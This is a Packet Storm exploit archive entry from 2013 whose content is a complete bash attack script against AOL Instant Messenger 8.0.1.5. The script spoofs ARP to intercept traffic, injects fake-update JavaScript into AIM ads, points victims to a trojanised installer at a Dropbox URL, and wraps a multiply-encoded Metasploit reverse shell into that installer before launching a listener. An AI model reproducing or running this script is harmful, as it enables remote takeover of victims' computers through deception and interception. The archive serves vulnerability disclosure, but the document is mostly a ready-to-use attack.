AOL Instant Messenger 8.0.1.5 Binary Planting

2013-07-08T00:00:00
ID PACKETSTORM:122305
Type packetstorm
Reporter Marshall Whittaker
Modified 2013-07-08T00:00:00

Description

                                        
                                            `#!/bin/bash  
  
### AOL Instant Messenger 8.0.1.5 (Jul 2013) Exploit Windows XP/7 tested and working.  
### Leverages binary file planting to My Documents via AIMs advertisement code.  
### Little social engineering built in using javascript to try to get them to run the AIM_Install.exe.  
### Starts a reverse shell back to your handler on 192.168.2.5:443 by default.  
  
### Marshall Whittaker  
  
ATTACKER="192.168.2.10";  
VICTIM="192.168.2.5";  
GATEWAY="192.168.2.1";  
REVPORT="443";  
PAYLOADSITE="https://dl.dropboxusercontent.com/s/dykenlhdobchjjv/AIM_Install.exe?token_hash=AAE2qGWSZAlAWJKepUu_2fP5UZfg-JTHktBGuu-I4BV34Q&dl=1";  
  
mkdir ~/aimpwn;  
echo "if (tcp.src == 80) {" > ~/aimpwn/aimpwn.filter;  
echo "if (search(DATA.data, \"atwola\")) {" >> ~/aimpwn/aimpwn.filter;  
echo "replace(\"_blank>\", \"_blank><script>alert('A new version of AOL Instant Messenger is available!');window.location = '$PAYLOADSITE'; setTimeout(function(){alert ('Navigate to your My Documents folder and start the installer by clicking AIM_Install and follow the steps.');}, 1000);</script>\");" >> ~/aimpwn/aimpwn.filter;  
echo "msg(\"PWNT.\n\");" >> ~/aimpwn/aimpwn.filter;  
echo "}" >> ~/aimpwn/aimpwn.filter;  
echo "}" >> ~/aimpwn/aimpwn.filter;  
etterfilter ~/aimpwn/aimpwn.filter -o ~/aimpwn/aimpwn.ef;  
### wget section.  
#wget http://download.newaol.com/aim/win/AIM_Install.exe -O ~/aimpwn/AIM_Install.exe;  
cp ~/aimpwn/AIM_Install.exe /opt/metasploit/apps/pro/msf3/data/templates/;  
msfpayload windows/shell/reverse_tcp LHOST=$ATTACKER LPORT=$REVPORT R | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/countdown -c 2 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -x AIM_Install.exe -t exe -e x86/call4_dword_xor -c 2 -o ~/aimpwn/AIM_Install.exe;  
### Uncomment wget section and put code to upload AIM_Install.exe to a site if you need to  
### change ATTACKER IP or port.  
ettercap -T -F ~/aimpwn/aimpwn.ef -q -M arp:remote /$GATEWAY/ /$VICTIM/ &  
msfcli exploit/multi/handler payload=windows/shell/reverse_tcp lhost=$ATTACKER lport=$REVPORT E;  
`